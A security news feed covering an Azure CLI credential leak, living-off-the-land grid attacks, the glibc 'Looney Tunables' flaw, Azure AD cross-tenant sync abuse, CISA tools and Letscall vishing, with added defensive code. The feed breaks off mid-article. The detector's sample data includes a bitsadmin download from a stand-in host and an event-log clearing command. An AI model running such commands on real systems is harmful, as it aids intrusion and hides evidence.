Information Security Newspaper | Hacking News (https://www.securitynewspaper.com), feed generated Tue, 14 Nov 2023 19:25:35 +0000

Azure CLI stores credentials in plaintext in logs. An easy technique to hack cloud environments
https://www.securitynewspaper.com/2023/11/14/azure-cli-stores-credentials-in-plaintext-in-logs-a-easy-technique-to-hack-cloud-environments/
Tue, 14 Nov 2023 19:19:06 +0000

The post Azure CLI stores credentials in plaintext in logs. A easy technique to hack cloud environments appeared first on Information Security Newspaper | Hacking News.
CVE-2023-36052 is a critical security vulnerability in the Azure Command-Line Interface (CLI), a tool for managing Azure resources. This vulnerability, reported by Palo Alto’s Prisma Cloud, allowed unauthenticated attackers to remotely access plaintext contents, including usernames and passwords, from Continuous Integration and Continuous Deployment (CI/CD) logs created using Azure CLI. These logs could be published by Azure DevOps and/or GitHub Actions. To mitigate this risk, users were advised to update their Azure CLI to version 2.53.1 or above.

Let’s consider a hypothetical example to understand the implications of CVE-2023-36052:

Suppose a development team uses Azure CLI for managing their Azure resources and automates their deployment process using GitHub Actions. During their routine operations, they execute various Azure CLI commands which generate logs. These logs, by default, include plaintext credentials such as usernames and passwords.

An external attacker, aware of this vulnerability, could access the public repository where the team’s GitHub Actions are configured. By examining the CI/CD logs published there, the attacker could find and extract these plaintext credentials. With these credentials, the attacker could gain unauthorized access to the team’s Azure resources, potentially leading to data breaches, unauthorized modifications, or even service disruptions.

This scenario underscores the critical nature of CVE-2023-36052, where seemingly benign logs could inadvertently become a source of significant security breaches. The mitigation steps provided by Microsoft, including updating Azure CLI and implementing best practices for log management and key rotations, are essential to prevent such unauthorized access.

Mitigation

Microsoft implemented several measures to address this vulnerability. These include:

  1. Azure CLI Update: Advising customers to update Azure CLI to the latest release.
  2. Securing Logs: Avoiding exposure of Azure CLI output in logs or publicly accessible locations and implementing guidance for masking environment variables.
  3. Regularly Rotating Keys and Secrets: Encouraging regular rotation of keys and secrets.
  4. Reviewing Security Best Practices: Providing guidance on secrets management for Azure services and GitHub Actions, and ensuring GitHub repositories are private unless necessary to be public.
  5. Securing Azure Pipelines: Offering guidance for securing Azure Pipelines.
  6. Enhancing Default Configurations: Introducing a new default configuration in Azure CLI to prevent accidental disclosure of sensitive information. This included restricting the presentation of secrets in output from update commands and broadening credential redaction capabilities across GitHub Actions and Azure Pipelines.

Workaround

Without patching, the primary alternative way to mitigate the risks associated with CVE-2023-36052 involves several best practices and security measures:

  1. Secure Logging Practices: Ensure that logs do not contain sensitive information. This might involve custom scripts or tools to filter out or obfuscate credentials and other sensitive data before they are logged.
  2. Access Control on Logs: Restrict access to CI/CD logs. Ensure that only authorized personnel can view these logs, and they are not publicly accessible.
  3. Frequent Credential Rotation: Regularly change credentials and secrets to reduce the window of opportunity for an attacker to use compromised credentials.
  4. Monitoring and Alerting: Implement monitoring to detect unusual access patterns or usage of credentials, which might indicate a compromise.
  5. Environment Segmentation: Segregate development, testing, and production environments. Limit the scope of what each environment can access to minimize potential damage.

However, these measures are more complex and potentially less effective than updating the Azure CLI to a patched version. Patching directly addresses the vulnerability at its source, providing a more comprehensive and straightforward solution.
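The first workaround item, filtering credentials out of Azure CLI output before it reaches a CI/CD log, is illustrated by the following added example (not code from the article or from Microsoft). The key names, value patterns and sample output are assumptions constructed for the example; the `::add-mask::` line is the GitHub Actions workflow command that hides a value in later log output.

```python
"""Redact credential-bearing fields from Azure CLI output before it is written to a CI/CD log.

Constructed example: the key names, value patterns and sample output below are
assumptions for illustration, not an official Microsoft list.
"""
import json
import re
from typing import Any, List

REDACTED = "***REDACTED***"

# Key names treated as secrets (compared after lower-casing and removing '-' and '_').
SECRET_KEY_PARTS = ("password", "secret", "connectionstring", "accesskey", "primarykey",
                    "secondarykey", "sastoken", "accesstoken", "refreshtoken")

# Value shapes that look like credentials even under an innocent key such as "value".
SECRET_VALUE_PATTERNS = [
    (re.compile(r"[A-Za-z0-9+/]{86}=="), REDACTED),                 # 64-byte base64 storage key
    (re.compile(r"eyJ[\w-]+\.[\w-]+\.[\w-]+"), REDACTED),            # JWT-shaped token
    (re.compile(r"(?i)(password|pwd|accountkey|sig)=[^;&\s\"]+"),   # connection string / SAS
     r"\1=" + REDACTED),
]


def _key_is_secret(key: str) -> bool:
    normalized = key.lower().replace("_", "").replace("-", "")
    return any(part in normalized for part in SECRET_KEY_PARTS)


def _scrub_text(text: str) -> str:
    """Mask credential-shaped substrings inside a free-form string."""
    for pattern, replacement in SECRET_VALUE_PATTERNS:
        text = pattern.sub(replacement, text)
    return text


def redact(obj: Any) -> Any:
    """Recursively mask secrets in the nested dict/list structures `az -o json` emits."""
    if isinstance(obj, dict):
        return {k: (REDACTED if _key_is_secret(k) and isinstance(v, (str, int, float))
                    else redact(v))
                for k, v in obj.items()}
    if isinstance(obj, list):
        return [redact(v) for v in obj]
    if isinstance(obj, str):
        return _scrub_text(obj)
    return obj


def collect_secrets(obj: Any, key: str = "") -> List[str]:
    """Return the raw secret strings, so a workflow can emit `::add-mask::<value>` for each
    and have the runner hide any later echo of that value in the job log."""
    found: List[str] = []
    if isinstance(obj, dict):
        for k, v in obj.items():
            found.extend(collect_secrets(v, k))
    elif isinstance(obj, list):
        for v in obj:
            found.extend(collect_secrets(v, key))
    elif isinstance(obj, str) and (_key_is_secret(key) or _scrub_text(obj) != obj):
        found.append(obj)
    return found


def redact_az_output(raw: str) -> str:
    """Entry point for a log filter: JSON output is walked structurally; anything else
    (table/tsv output) is scrubbed by value shape only."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError:
        return _scrub_text(raw)
    return json.dumps(redact(data), indent=2)


# Constructed sample resembling the output of several az commands run in one pipeline step.
SAMPLE_AZ_DATA = {
    "storageKeys": [{"keyName": "key1", "permissions": "FULL", "value": "A" * 86 + "=="}],
    "connectionStrings": {"MyDb": {"type": "SQLAzure",
        "value": "Server=tcp:example.database.windows.net;User ID=app;Password=hunter2;"}},
    "servicePrincipal": {"appId": "00000000-0000-0000-0000-000000000000",
                         "password": "not-a-real-secret", "tenant": "contoso.example"},
    "accessToken": "eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJ0ZXN0In0.c2lnbmF0dXJl",
}
SAMPLE_AZ_OUTPUT = json.dumps(SAMPLE_AZ_DATA)

if __name__ == "__main__":
    for secret in collect_secrets(SAMPLE_AZ_DATA):
        print(f"::add-mask::{secret}")   # consumed by the Actions runner, not shown in the log
    print(redact_az_output(SAMPLE_AZ_OUTPUT))
```

Pipe the output of each `az` step through `redact_az_output` (or emit the mask commands first) rather than echoing it directly into the job log.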

How Living-off-the-land (LotL) technique is used to hack into power grids & cause power outages
https://www.securitynewspaper.com/2023/11/10/how-living-off-the-land-lotl-technique-is-used-to-hack-into-power-grids-cause-power-outages/
Fri, 10 Nov 2023 22:27:24 +0000

Living-off-the-land (LotL) techniques in cyber attacks refer to the use of legitimate, native tools already present in the target system to carry out malicious activities. This approach is particularly stealthy because it leverages tools and processes that are typically trusted and thus less likely to raise alarms. In the context of Operational Technology (OT) or Industrial Control Systems (ICS), such attacks can be especially dangerous due to the critical nature of the systems involved. Here’s how such an attack might work, with examples:

1. Initial Access

  • Example: A phishing email is sent to an employee in the OT/ICS environment. The email contains a seemingly harmless document that, when opened, executes a PowerShell script (a native Windows tool) to create a backdoor.

2. Lateral Movement

  • Example: Once inside the network, attackers might use legitimate system administration tools like Windows Management Instrumentation (WMI) or Remote Desktop Protocol (RDP) to move laterally across the network, searching for critical OT/ICS components.

3. Elevation of Privileges

  • Example: Attackers might use built-in tools like Netstat to identify security software or firewall settings and then use other native scripts or commands to disable these defenses, or to elevate their access privileges within the system.

4. Discovery and Information Gathering

  • Example: Tools like Tasklist or Systeminfo (native to Windows) are used to gather information about the system, such as running processes, installed software, or network configurations relevant to the OT/ICS environment.

5. Exploitation and Manipulation

  • Example: In an ICS environment, attackers might use standard industrial communication protocols like Modbus or DNP3 (which are legitimate and essential for normal operations) to send malicious commands to control systems, potentially disrupting physical processes like power generation or water treatment.

6. Persistence and Exfiltration

  • Example: Attackers could use standard data transfer tools like FTP or even Windows BITS (Background Intelligent Transfer Service) to exfiltrate stolen data, or to maintain persistence by regularly updating malware or downloading additional tools.

7. Cleanup

  • Example: To erase their tracks, attackers might use native cleanup tools or scripts to delete logs or any evidence of their activities, making detection and forensics much more difficult.
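Because every tool in the seven stages above is also used legitimately by administrators, a defender cannot alert on any single one of them; what distinguishes LotL activity is the chain. The following added example (not code from the article) correlates process-creation events per host into those stages and alerts only when several distinct stages occur within a window. The event fields, host names and timings are constructed, and the stage rules key on exactly the native tools the article names.

```python
"""Correlate native-tool process events into LotL attack-chain stages (constructed example).

Assumptions: events come from a process-creation source (Sysmon event 1 or similar)
already parsed into ProcEvent; hosts, users, command lines and timings are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    user: str
    parent: str   # parent process image name
    image: str    # process image name
    cmdline: str


def stage_for(e: ProcEvent) -> Optional[str]:
    """Map one event to the attack-chain stage it is characteristic of, or None."""
    img, parent, cmd = e.image.lower(), e.parent.lower(), e.cmdline.lower()
    if img == "powershell.exe" and parent in OFFICE_APPS:
        return "initial_access"          # a document launching a PowerShell script
    if (img == "wmic.exe" and "/node:" in cmd) or img == "mstsc.exe":
        return "lateral_movement"        # WMI against a remote host, or the RDP client
    if img == "netstat.exe":
        return "defense_discovery"       # enumerating listeners / security software
    if img in {"tasklist.exe", "systeminfo.exe"}:
        return "discovery"
    if (img == "bitsadmin.exe" and "/transfer" in cmd) or img == "ftp.exe":
        return "transfer"                # BITS or FTP moving data or tooling
    if img == "wevtutil.exe" and " cl " in f" {cmd} ":
        return "cleanup"                 # event log clearing
    return None


def detect_chains(events: List[ProcEvent], window: timedelta = timedelta(hours=24),
                  min_stages: int = 3) -> Dict[str, dict]:
    """Per host, find the first sliding window in which at least `min_stages` distinct
    stages occur. A single stage (an admin running tasklist) never alerts on its own."""
    by_host: Dict[str, list] = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev.ts):
        stage = stage_for(e)
        if stage:
            by_host[e.host].append((e.ts, stage, e))
    alerts: Dict[str, dict] = {}
    for host, hits in by_host.items():
        for i, (t0, _, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - t0 <= window]
            stages = {h[1] for h in in_window}
            if len(stages) >= min_stages:
                alerts[host] = {"first_seen": t0, "stages": stages,
                                "events": [h[2] for h in in_window]}
                break
    return alerts


def _ev(host, user, parent, image, cmdline, hour, minute=0):
    return ProcEvent(datetime(2023, 11, 10, hour, minute), host, user, parent, image, cmdline)


# Constructed sample: one workstation walking the chain, one admin host doing routine work.
SAMPLE_EVENTS = [
    _ev("eng-ws01", "jdoe", "winword.exe", "powershell.exe",
        "powershell.exe -File C:\\Users\\jdoe\\AppData\\Local\\Temp\\invoice.ps1", 9, 2),
    _ev("eng-ws01", "jdoe", "powershell.exe", "tasklist.exe", "tasklist.exe /v", 9, 5),
    _ev("eng-ws01", "jdoe", "powershell.exe", "netstat.exe", "netstat.exe -ano", 9, 6),
    _ev("eng-ws01", "jdoe", "cmd.exe", "wmic.exe", "wmic.exe /node:hmi-01 os get caption", 9, 40),
    _ev("eng-ws01", "jdoe", "cmd.exe", "bitsadmin.exe",
        "bitsadmin.exe /transfer job1 https://example.invalid/upd.bin C:\\ProgramData\\upd.bin", 10, 15),
    _ev("eng-ws01", "jdoe", "cmd.exe", "wevtutil.exe", "wevtutil.exe cl Security", 10, 30),
    _ev("admin-ws02", "ops", "cmd.exe", "tasklist.exe", "tasklist.exe", 11, 0),
    _ev("admin-ws02", "ops", "cmd.exe", "systeminfo.exe", "systeminfo.exe", 11, 1),
    _ev("admin-ws02", "ops", "explorer.exe", "mstsc.exe", "mstsc.exe /v:fileserver", 11, 5),
]

if __name__ == "__main__":
    for host, alert in detect_chains(SAMPLE_EVENTS).items():
        print(host, alert["first_seen"], sorted(alert["stages"]))
```

In an OT network the same idea extends to the protocol layer: Modbus or DNP3 write commands from a host that has never issued them before are another stage worth adding to the chain.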

In late 2022, a significant cyber-physical incident occurred in Ukraine, attributed to the Russia-linked threat actor Sandworm. This event targeted Ukrainian critical infrastructure and utilized a multi-event cyber attack strategy, incorporating innovative techniques to impact industrial control systems (ICS) and operational technology (OT). The Sandworm actor employed OT-level living-off-the-land (LotL) techniques, likely causing a substation’s circuit breakers to trip and resulting in an unplanned power outage. This outage coincided with mass missile strikes across Ukraine’s critical infrastructure. Additionally, Sandworm executed a second disruptive event by deploying a new variant of CADDYWIPER malware in the victim’s IT environment.

This attack exemplifies the latest advancements in Russia’s cyber-physical attack capabilities, particularly visible since Russia’s invasion of Ukraine. The techniques used indicate a maturing offensive OT arsenal, capable of identifying novel OT threat vectors, developing new capabilities, and leveraging various types of OT infrastructure for attacks. Utilizing LotL techniques likely reduced the time and resources required for the cyber-physical attack. Although the initial intrusion point remains undetermined, the rapid development of the OT component of this attack suggests the actor’s ability to swiftly create similar capabilities against other OT systems globally.

Sandworm, active since at least 2009, is a versatile threat actor conducting espionage, influence, and attack operations, primarily supporting Russia’s Main Intelligence Directorate (GRU). The group’s primary focus has been Ukraine, where it has orchestrated disruptive and destructive attacks using wiper malware, especially during Russia’s re-invasion in 2022. However, Sandworm’s activities extend globally, underlining the Russian military’s extensive ambitions and interests in various regions. The group’s global threat activity and novel OT capabilities necessitate proactive measures from OT asset owners to mitigate potential risks.

According to Mandiant’s research, the 2022 intrusion began on or before June 2022 and culminated in two disruptive events, on October 10 and October 12. Sandworm reached the OT environment through a hypervisor that hosted a SCADA management instance for a substation, which means it had access to the system controlling the substation, potentially for up to three months without being detected. On October 10, the actor used an optical disc (ISO) image named “a.iso” to execute a native MicroSCADA binary, most likely to issue control commands that switched off substations.

This case underscores the evolving nature of cyber threats, particularly in critical infrastructure sectors. The increasing sophistication and rapid development of such attacks highlight the need for enhanced cybersecurity measures, continuous monitoring, and preparedness against novel and complex cyber threats in OT and ICS environments.

In OT/ICS environments, such LotL attacks are particularly concerning because they:

  • Are harder to detect due to the use of legitimate tools.
  • Can cause significant physical and operational damage.
  • May bypass traditional security measures that don’t account for malicious use of native tools.

Defending against such attacks requires a combination of robust cybersecurity practices, including employee training, network segmentation, constant monitoring for anomalous behaviors, and regular updating and patching of all systems.

Hacking Debian 12, 13, Ubuntu 22.04, 23.04 & Fedora 37, 38 servers using a single vulnerability
https://www.securitynewspaper.com/2023/10/04/hacking-debian-12-13-ubuntu-22-04-23-04-fedora-37-38-servers-using-a-single-vulnerability/
Wed, 04 Oct 2023 18:58:34 +0000

The team at Qualys Threat Research Unit has unveiled a fresh vulnerability within the Linux operating system, allowing local attackers to escalate their access level to root privileges. This escalation is made possible by exploiting a buffer overflow weakness located in the GNU C Library’s ld.so dynamic loader. Assigned the identification CVE-2023-4911 and nicknamed “Looney Tunables,” this vulnerability is recognized as high-risk with a CVSS score of 7.8, signifying its high severity.

“Looney Tunables” allows bad actors to exploit a buffer overflow within the ld.so dynamic loader of the GNU C Library (glibc). This exploitation path provides local attackers with a mechanism to elevate their privileges to root level, thereby gaining unparalleled access and control over the system. Given that root privileges allow complete control over a system, attackers can execute a variety of malicious activities, from accessing sensitive information to altering system settings and functionalities, underscoring the critical nature of this security flaw.

The GNU C Library, or glibc, is fundamentally integral to the operation of a majority of systems based on the Linux kernel. This crucial library facilitates numerous system calls, from elementary functions like open, malloc, and printf to more complex ones such as exit, serving as the operational backbone for these systems. As such, glibc plays a pivotal role in the functionality and performance of Linux-based systems, making any vulnerability within this library particularly concerning for system administrators and users alike.

Within glibc, the ld.so dynamic loader is an element of paramount importance. This component is tasked with the significant responsibility of initializing and running programs on Linux systems that rely on glibc for their operation. Its role is crucial as it ensures the smooth execution of various applications and services on a Linux system, making it an indispensable part of the operating environment. Given its central function, any vulnerability within the ld.so dynamic loader is a matter of serious concern as it could potentially compromise the security and stability of a wide range of systems.

In light of the discovery of “Looney Tunables”, it is imperative for organizations and users utilizing Linux-based systems to acknowledge and address this security vulnerability swiftly to safeguard their systems against potential exploits. Immediate mitigation steps, including the application of security patches and updates, should be undertaken to protect systems from the risks associated with this high-severity vulnerability. Users and administrators should stay vigilant and monitor any security advisories and updates issued by the Linux community and cybersecurity experts to ensure timely and effective protection against this newly identified threat.

Furthermore, it would be prudent for organizations to adopt and enforce a set of security best practices. These might include the regular updating and patching of systems, the use of reliable security solutions, conducting cybersecurity awareness and training programs for employees, and implementing network segmentation strategies. These proactive measures can significantly enhance the security posture of an organization, providing robust defense mechanisms against “Looney Tunables” and other similar security threats that might emerge in the future.

The flaw lies in the GNU C Library’s ld.so dynamic loader and is triggered while the loader processes the ‘GLIBC_TUNABLES’ environment variable. Put simply, a local attacker who can craft the contents of ‘GLIBC_TUNABLES’ and then launch a binary that has the SUID bit set can execute code with that binary’s dangerously high privileges.

The vulnerability was discovered by the Qualys Threat Research Unit. Its origin was traced back to April 2021, to a commit that shipped in glibc version 2.34. Ironically, that commit was intended to improve security by correcting the behavior of SXID_ERASE in setuid applications.

Keep in mind that attackers with only the most basic privileges can take advantage of this severe gap. Because the attacks are simple and require no user interaction, they are particularly alarming.

For those who cannot update promptly and do not have Secure Boot, a workaround is available: a SystemTap script that, once enabled, immediately terminates any setuid program launched with the ‘GLIBC_TUNABLES’ environment variable present. To call a setuid program safely afterwards, unset or remove ‘GLIBC_TUNABLES’ from the environment, for instance by running ‘GLIBC_TUNABLES= sudo’.

According to Saeed Abbasi, who is the Product Manager at Qualys’ Threat Research Unit, “Our successful exploitation, leading to full root privileges on major distributions like Fedora, Ubuntu, and Debian, underscores the profound and ubiquitous nature of this vulnerability.”

While the Qualys team has said it will not release its exploit code at this time, the simplicity of turning the buffer overflow into a data-only attack suggests that other research teams may soon take up the challenge.

Systems running Debian 12 and 13, Ubuntu 22.04 and 23.04, or Fedora 37 and 38 are vulnerable to CVE-2023-4911 and should be updated without delay. Because glibc is used across so many Linux distributions, the potential extent of the harm is enormous. Distributions such as Alpine Linux, which use musl libc instead of glibc, are spared this particular flaw.

New Azure AD Cross-Tenant Synchronisation (CTS) Attack allows hacking tenants laterally
https://www.securitynewspaper.com/2023/08/04/new-azure-ad-cross-tenant-synchronisation-cts-attack-allows-hacking-tenants-laterally/
Fri, 04 Aug 2023 19:52:00 +0000

Attackers continue to target Microsoft identities in order to break into connected Microsoft applications and federated SaaS applications, and they increasingly do so not by exploiting vulnerabilities but by misusing core Microsoft features. The group Nobelium, associated with the SolarWinds attacks, has been shown to use native capabilities such as the creation of Federated Trusts to gain permanent access to a Microsoft tenant. Cross-Tenant Synchronization (CTS) is a newer Microsoft feature that lets organizations synchronize users and groups from one or more source tenants and grant them access to resources in a destination tenant, including both Microsoft and non-Microsoft applications. CTS builds on earlier B2B trust settings to enable automatic and seamless collaboration across tenants, which makes it a feature many businesses will want to adopt, and a strong and valuable tool for organizations such as corporate conglomerates with multiple tenants across related companies.

However, if CTS is not configured and maintained carefully, it opens the door to reconnaissance, lateral movement, and persistence by malicious actors. CTS adds users from another tenant to a target tenant by synchronizing their accounts. An attacker who has compromised one tenant can abuse a loosely configured CTS setting to move laterally into another tenant of the same or a different company, and can install a malicious CTS configuration as a backdoor to retain access to a Microsoft tenant from a tenant the attacker controls.

Vectra AI, a cybersecurity company, recently published research describing how threat actors might use this capability to move laterally into connected tenants or to maintain persistence.

However, the researchers also caution that to abuse this functionality a threat actor must first compromise a privileged account, or escalate privileges, in an already compromised Microsoft cloud environment. The first method in Vectra AI’s paper involves reviewing the CTS settings to find target tenants connected through these policies, and in particular looking for tenants with the ‘Outbound Sync’ feature enabled, which allows synchronization to other tenants.

After finding a tenant that meets those requirements, the attacker locates the application used for CTS synchronization and modifies its configuration to add the compromised user to its sync scope. This gives the attacker access to the other tenant’s network, and so the threat actor achieves lateral movement without needing new user credentials.

The second method that Vectra demonstrates includes establishing a rogue CTS configuration in order to maintain permanent access to the tenants that are the focus of the attack. It should be emphasized once again that in order for this strategy to work, the threat actor must have already succeeded in compromising a privileged account inside the tenant.

To get more specific, the attacker installs a new CTS policy and activates ‘Inbound Sync’ and ‘Automatic User Consent,’ which gives them the ability to push new users from their external tenancy to the target at any moment.

Because of the way this arrangement is configured, the attacker will always have access to the target tenancy via the external account.

Even if the rogue accounts are deactivated, the attacker can still create and “push” new users at any time, obtaining instant access to the resources of the target tenant. This is why the researchers refer to this technique as a “backdoor.”

Defense

The attack methods described in this article presume that a compromise has already occurred. Continued implementation and enforcement of security best practices within businesses is required to keep lowering the chance of accounts being compromised.

CTS target tenants should:

  • Avoid establishing a default inbound CTA configuration if at all possible, since it allows any user, group, or application from the source tenant to sync inbound.
  • Implement a less inclusive inbound CTA configuration, such as specifically designating the accounts (where feasible) or groups that can receive access via CTS.
  • Combine the CTA policy with additional Conditional Access Policies in order to block access by unauthorized users.

CTS source tenants should:

  • Ensure that all privileged groups, including those permitted access to other tenants through CTS, are subject to appropriate levels of control and monitoring.
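An audit of the two configurations this article warns about (a default inbound policy that admits all users, and a partner with Inbound Sync plus Automatic User Consent enabled) can be scripted against exported cross-tenant access settings. The following added example is not from the article or from Vectra; the objects are constructed to resemble Microsoft Graph crossTenantAccessPolicy data, and the field names used (`automaticUserConsentSettings.inboundAllowed`, `identitySynchronization.userSyncInbound.isSyncAllowed`, `b2bCollaborationInbound.usersAndGroups`) are an assumption to be checked against the Graph documentation before use.

```python
"""Audit cross-tenant access settings for the CTS abuse patterns described in the article.

Constructed example. DEFAULT_POLICY and PARTNERS mimic what an export of
GET /policies/crossTenantAccessPolicy/default and /partners (with each partner's
identitySynchronization) might contain; the field names are an assumption.
"""
from typing import Dict, List, Set, Tuple

Finding = Tuple[str, str, str]   # (scope, severity, message)

# Approved partner tenant IDs (constructed allowlist; in practice kept under change control).
KNOWN_PARTNERS: Set[str] = {"aaaaaaaa-0000-0000-0000-000000000001"}

DEFAULT_POLICY = {
    "b2bCollaborationInbound": {
        "usersAndGroups": {"accessType": "allowed",
                           "targets": [{"target": "AllUsers", "targetType": "user"}]},
    },
    "automaticUserConsentSettings": {"inboundAllowed": False, "outboundAllowed": False},
}

PARTNERS = [
    {   # legitimate subsidiary: inbound sync on, but users still require consent/review
        "tenantId": "aaaaaaaa-0000-0000-0000-000000000001",
        "displayName": "Subsidiary A",
        "automaticUserConsentSettings": {"inboundAllowed": False, "outboundAllowed": False},
        "identitySynchronization": {"userSyncInbound": {"isSyncAllowed": True}},
    },
    {   # the rogue configuration from the article: Inbound Sync + Automatic User Consent
        "tenantId": "bbbbbbbb-0000-0000-0000-000000000002",
        "displayName": "Partner added outside change control",
        "automaticUserConsentSettings": {"inboundAllowed": True, "outboundAllowed": True},
        "identitySynchronization": {"userSyncInbound": {"isSyncAllowed": True}},
    },
]


def _allows_all_users_inbound(policy: Dict) -> bool:
    """True when the inbound B2B collaboration setting admits every user and group."""
    ug = (policy.get("b2bCollaborationInbound") or {}).get("usersAndGroups") or {}
    if ug.get("accessType") != "allowed":
        return False
    return any(t.get("target") == "AllUsers" for t in ug.get("targets", []))


def audit(default_policy: Dict, partners: List[Dict],
          known: Set[str] = KNOWN_PARTNERS) -> List[Finding]:
    """Return findings in the order encountered; an empty list means nothing was flagged."""
    findings: List[Finding] = []
    if _allows_all_users_inbound(default_policy):
        findings.append(("default", "HIGH",
                         "default inbound policy admits all users and groups from any "
                         "partner; scope it to named accounts or groups"))
    for p in partners:
        tid = p["tenantId"]
        consent = p.get("automaticUserConsentSettings") or {}
        sync_in = ((p.get("identitySynchronization") or {})
                   .get("userSyncInbound") or {}).get("isSyncAllowed") is True
        auto_consent = consent.get("inboundAllowed") is True
        if tid not in known:
            findings.append((tid, "HIGH", "partner tenant is not on the approved list"))
        if sync_in and auto_consent:
            findings.append((tid, "HIGH", "inbound user sync with automatic consent: "
                             "the partner can push accounts into this tenant at any time"))
        elif sync_in:
            findings.append((tid, "MEDIUM",
                             "inbound user sync enabled; confirm the scope is limited"))
        if consent.get("outboundAllowed") is True and tid not in known:
            findings.append((tid, "MEDIUM", "automatic outbound consent to an unapproved tenant"))
    return findings


if __name__ == "__main__":
    for scope, severity, message in audit(DEFAULT_POLICY, PARTNERS):
        print(f"[{severity}] {scope}: {message}")
```

Run it on each export and alert on any new HIGH finding, since a partner appearing with inbound sync and automatic consent is exactly the backdoor shape the researchers describe.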

Top 5 free cloud security tools that can protect your AWS & Azure cloud data from hackers
https://www.securitynewspaper.com/2023/07/18/top-5-free-cloud-security-tools-that-can-protect-your-aws-azure-cloud-data-from-hackers/
Tue, 18 Jul 2023 23:07:25 +0000

The Cybersecurity and Infrastructure Security Agency (CISA) has compiled a list of free tools that businesses may use to protect themselves in cloud-based settings. According to the article published by CISA, these tools will help incident response analysts and network defenders mitigate, identify, and detect threats, known vulnerabilities, and anomalies in cloud-based or hybrid environments. During an attack, threat actors have traditionally focused on on-premises servers. However, the rapid expansion of cloud migration has drawn several threat actors to target cloud systems, given the large number of attack vectors available in the cloud.

Organizations that lack the capabilities needed to protect themselves against cloud-based attacks may benefit from the tools supplied by CISA. These tools may help users secure their cloud resources from data theft and information exposure.
CISA stated that companies should use the security features supplied by their Cloud Service Providers and combine them with the free tools recommended by CISA in order to defend themselves from these attacks. The following is a list of the tools that CISA provides:

  1. Cybersecurity Evaluation Tool (CSET).
  2. The SCuBAGear tool.
  3. The Untitled Goose Tool
  4. Decider Tool
  5. Memory Forensic on Cloud (JPCERT/CC) is an offering of Japan CERT.

Cybersecurity Evaluation Tool (CSET)

CISA created this tool to help enterprises assess their cybersecurity posture, using standards, guidelines, and recommendations that are widely accepted in the industry. The tool asks multiple questions about operational rules and procedures, as well as about the design of the system. This information is then used to produce a report that gives a comprehensive view of the organization’s strengths and shortcomings, along with suggestions for remedying them. CSET version 11.5 includes the Cross-Sector Cybersecurity Performance Goals (CPG), which were established by the National Institute of Standards and Technology (NIST) in collaboration with CISA.

The CPG is able to give best practices and guidelines that should be followed by all organizations. This tool may assist in the fight against prevalent and significant TTPs.

M365 Secure Configuration Baseline Assessment Tool (SCuBAGear)

SCuBAGear was developed as part of CISA’s SCuBA (Secure Cloud Business Applications) project, which was started in direct response to the supply chain compromise of SolarWinds Orion software. SCuBAGear is automated software that compares an M365 tenant’s configuration against CISA’s secure configuration baselines for the Federal Civilian Executive Branch (FCEB). Alongside SCuBAGear, CISA has produced several materials that can serve as cloud security guidance for all types of enterprises. Three documents came out of this work:

  • SCuBA Technical Reference Architecture (TRA) — offers fundamental building blocks for strengthening the security of cloud environments. Its scope covers cloud-based business applications (SaaS models) and the security services used to protect and monitor them.
  • Hybrid Identity Solutions Architecture — describes the best available methods for handling identity management in a cloud-hosted environment.
  • M365 Security Configuration Baseline (SCB) — provides baseline security settings for Microsoft Defender 365, OneDrive, Azure Active Directory, Exchange Online, and other services. SCuBAGear generates an HTML report that lists deviations from the policies in the M365 SCB.

Untitled Goose Tool

This tool, created in collaboration with Sandia National Laboratories, is designed to help network defenders locate harmful behavior in Microsoft Azure, Active Directory, and Microsoft 365. It also enables querying, exporting, and investigating audit logs. Organizations that do not import these sorts of logs into their Security Information and Event Management (SIEM) platform will find this tool particularly helpful. It was designed as an alternative to the PowerShell tools available at the time, which lacked the capability to gather data for Azure, AAD, and M365.

Network defenders may use this tool to:

  • Extract cloud artifacts from Active Directory, Microsoft Azure, and Microsoft 365.
  • Perform time bounding on the Unified Audit Logs (UAL).
  • Collect MDE (Microsoft Defender for Endpoint) data using the time-bounding feature.

Decider Tool

Incident response analysts may find this tool useful for mapping malicious actions to the MITRE ATT&CK framework. It also makes the ATT&CK techniques more accessible and offers guidance for documenting the observed actions in the appropriate manner. Much like CSET, Decider asks a number of questions in order to guide the user toward the most effective identification technique. With all of this information, users can:

  • Export heatmaps from the ATT&CK Navigator.
  • Publish reports on the threat intelligence they have collected.
  • Determine and put into effect the appropriate preventative measures.
  • Prevent exploitation.

In addition, CISA has provided a link that describes how to use the Decider tool.

Memory Forensic on Cloud (JPCERT/CC)

This tool was built to construct and analyze Windows memory images on AWS using Volatility 3. Memory forensics is also necessary for the increasingly common LOTL (Living-Off-the-Land) attacks, also known as fileless malware.
Memory image analysis can be valuable during incident response engagements, but it normally calls for high-specification equipment, a significant amount of time, and other resources to prepare the analysis environment adequately.

The post Top 5 free cloud security tools, that can protect your AWS & Azure cloud data from hackers appeared first on Information Security Newspaper | Hacking News.

]]>
VoIP phishing call to rob a bank. New Letscall attack technique https://www.securitynewspaper.com/2023/07/10/voip-phishing-call-to-rob-a-bank-new-letscall-attack-technique/ Mon, 10 Jul 2023 23:39:18 +0000 https://www.securitynewspaper.com/?p=26923

]]>
Researchers at ThreatFabric discovered, and the company issued a warning about, a new and more sophisticated form of voice phishing known as vishing. In recent years, the prevalence of vishing, also known as Voice over IP phishing, has increased to the point that it has undermined people’s trust in calls coming from numbers they do not recognize.

Receiving phone calls from people professing to work at the bank is upsetting, and the likelihood that any given incoming call you receive throughout the day is coming from a con artist is incredibly high. During routine investigations into potential threats, the researchers came across a previously unknown collection of malicious programs that were quite similar to those Kaspersky had identified.

“Letscall” is the name given to this toolset by the threat actor group responsible for these campaigns. At the moment, the victims of these campaigns are people living in South Korea. In a purely technical sense, there is nothing stopping the group from expanding the scope of the attack to nations inside the European Union. In other words, we are dealing with a framework that is fully functional and ready to be used: it contains all of the instructions and tools necessary to control the infected devices and to communicate with the victims, and any threat actor could use it.

The group most likely includes:

  1. Android developers who are familiar with the contemporary notion of VoIP traffic routing. The researchers refer to the participants in one of the phases as “developers” because they noticed command name discrepancies throughout that stage.
  2. Designers who are responsible for the web pages, iconography, and content of the administrative panel, phishing web sites, and malicious mobile apps.
